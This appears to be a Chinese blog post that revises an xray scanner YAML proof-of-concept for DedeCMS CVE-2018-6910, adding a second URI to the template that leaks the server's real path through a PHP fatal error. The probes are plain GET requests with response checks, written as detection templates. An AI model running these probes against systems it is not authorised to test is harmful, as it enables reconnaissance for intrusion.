xray插件改良2-poc-yaml-dedecms-cve-2018-6910
前言
poc-yaml-dedecms-cve-2018-6910原始的yml
dedecms-cve-2018-6910.yml
name: poc-yaml-dedecms-cve-2018-6910
rules:
- method: GET
path: /include/downmix.inc.php
expression: |
response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
detail:
author: PickledFish(https://github.com/PickledFish)
links:
- https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md
这里实际上是不完善的,根据links的描述,能够泄露真实路劲的uri应该是两个
所以改良之后的yml应该是
name: poc-yaml-dedecms-cve-2018-6910-2poc
groups:
poc1:
- method: GET
path: /include/downmix.inc.php
expression: |
response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("downmix.inc.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
poc2:
- method: GET
path: /dede/inc/inc_archives_functions.php
expression: |
response.status == 200 && response.body.bcontains(bytes("Fatal error")) && response.body.bcontains(bytes("inc_archives_functions.php")) && response.body.bcontains(bytes("Call to undefined function helper()"))
detail:
author: PickledFish(https://github.com/PickledFish)
links:
- https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md
这个漏洞意义不大,不太清楚xray为何收录。